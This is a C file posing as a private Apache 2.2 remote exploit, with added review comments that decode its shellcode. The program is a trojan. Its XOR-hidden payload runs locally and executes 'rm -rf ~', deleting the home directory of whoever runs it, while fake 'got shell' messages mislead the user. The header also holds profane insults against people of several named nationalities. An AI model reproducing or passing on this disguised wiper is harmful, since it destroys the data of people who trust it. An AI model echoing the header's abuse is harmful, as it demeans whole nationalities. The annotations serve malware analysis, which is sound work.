- /*
- ===========================================================
- !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE!
- ===========================================================
- Apache 2.2.0 - 2.2.11 Remote exploit
- Exploiting an off-by-one bug in apr_uri_parse_hostinfo()
- which leads to allocation of an arbitrary amount of memory,
- put the shellcode then reliably jump in upon invocation
- of the APR callback.
- Compile: gcc fuckapache.c -o fuckapache
- Usage: ./fuckapache <hostname> <port>
- E.g:
- ===========================================================
- [test@localhost tmp]$ ./fuck localhost 80
- Connected, sending out the evil request...
- Waiting some seconds to see if we got shell...
- Now type nc localhost 12345 to see if you've got shell there
- [test@localhost tmp]$ nc localhost 12345
- id
- uid=48(apache) gid=48(apache) groups=48(apache)
- ^D
- ==========================================================
- Fuck all script kiddies around the world. No more free bugs, get lost.
- Fuck all Indonesian, Malaysian, Pakistani, Saudi, Marrocan, Nigerian,
- Turkish and other third-world *hack3rz* whose only contribution to the
- world is writing dummy sqli scripts in python flooding the net
- with BS like "kekekekeke" "ajjajaja" "i kill you".
- Feel free to suck my balls, all of you.
- Have phun :)
- */
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- #include <string.h>
- #include <unistd.h>
- #include <stdlib.h>
/*
 * Print the expected command line to stdout and terminate with status 1.
 * argv[0] is used as the program name; this function does not return.
 */
void usage(char *argv[])
{
    const char *prog = argv[0];

    fprintf(stdout, "Usage: %s <hostname> <port>\n\n", prog);
    exit(1);
}
/*
 * main - resolve <hostname>, connect to <port> over TCP, send one HTTP
 * request, then fork and call the embedded byte string as a function in
 * the child process.
 *
 * NOTE(review): nothing in this file runs the payload on the remote
 * server; it is run locally, by sc() in the forked child. Decoded (i386
 * Linux, int 0x80 with al=0x0b, i.e. execve), the bytes build "/bin/sh",
 * "-c" and a command whose text is hidden by XOR with 0x51 and comes out
 * as "rm -rf ~": it deletes the home directory of the account that runs
 * this program. No socket/bind/listen call appears in the bytes, so the
 * "bindshell" label and the port-12345 message are not backed by code.
 * This is a trojan aimed at whoever compiles it; handle it as a malware
 * sample (throwaway VM, no real home directory).
 *
 * Exit codes visible here: 1 (usage, socket, send), 2 (gethostbyname),
 * 3 (connect). main has no return statement at its end.
 */
- int main(int argc,char *argv[])
- {
- // we_are_evil_we_are_evil_bindshell_31337_shellcode_in_91_bytes:>
// NOTE(review): the label above is misleading; see the decode in the
// function comment. The two 0x51515151 XOR immediates on the 4th and 5th
// lines of the literal are what hide the command text from a strings(1) pass.
- char *shellcode=
- "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
- "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
- "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
- "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
- "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
- "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
- "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
// The string literal is cast to a function pointer; calling sc() executes
// the bytes above inside this program, on the local machine.
- int (*sc)()=(int(*)())shellcode;
- char host[100];
- int sd;
// sin is declared but never used in main.
- struct sockaddr_in sin;
- struct sockaddr_in pin;
- struct hostent *hp;
- // assuming PAGE_SIZE==4096 which is the most common case.
// NOTE(review): the malloc result is not checked before sprintf writes to it.
- char *evilreq=malloc(4096);
- pid_t pid;
- if (argc!=3) usage(argv);
// NOTE(review): unbounded copy of argv[1] into the 100-byte host buffer.
- strcpy(host,argv[1]);
- if ((hp = gethostbyname(host)) == 0) {
- perror("gethostbyname");
- exit(2);
- }
- memset(&pin, 0, sizeof(pin));
- pin.sin_family = AF_INET;
- pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
// atoi gives no error indication for a non-numeric port argument.
- pin.sin_port = htons(atoi(argv[2]));
- if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- perror("socket");
- exit(1);
- }
- if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) {
- perror("connect");
- exit(3);
- }
- printf("Connected, sending out the evil request...\n");
- // prepare teh evil request
// The request is a plain "GET /" with two headers; "%%" emits a literal
// '%' and "%91s" appends the payload bytes padded to at least 91
// characters inside the Cache-Control value.
// NOTE(review): no URI host part is sent, so the apr_uri_parse_hostinfo()
// claim in the file header is not reflected in this request; presumably it
// is decoration for the local payload (unverified).
- sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
- if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
- perror("send");
- exit(1);
- }
- printf("Waiting some seconds to see if we got shell...\n");
- pid=fork();
// Child: closes stderr (fd 2), which hides any error output, then runs
// the payload locally via sc(). A fork() failure (-1) is not handled and
// falls into the parent branch.
- if (pid==0) {close(2);sc();exit(0);}
- else
- {
// Parent: waits two seconds, then prints the "shell" message. The test
// below only checks that the descriptor value is non-zero; the server's
// response is never read, so the message says nothing about the remote host.
- sleep(2);
- if (sd)
- {
- printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]);
- close(sd);
- }
- }
- }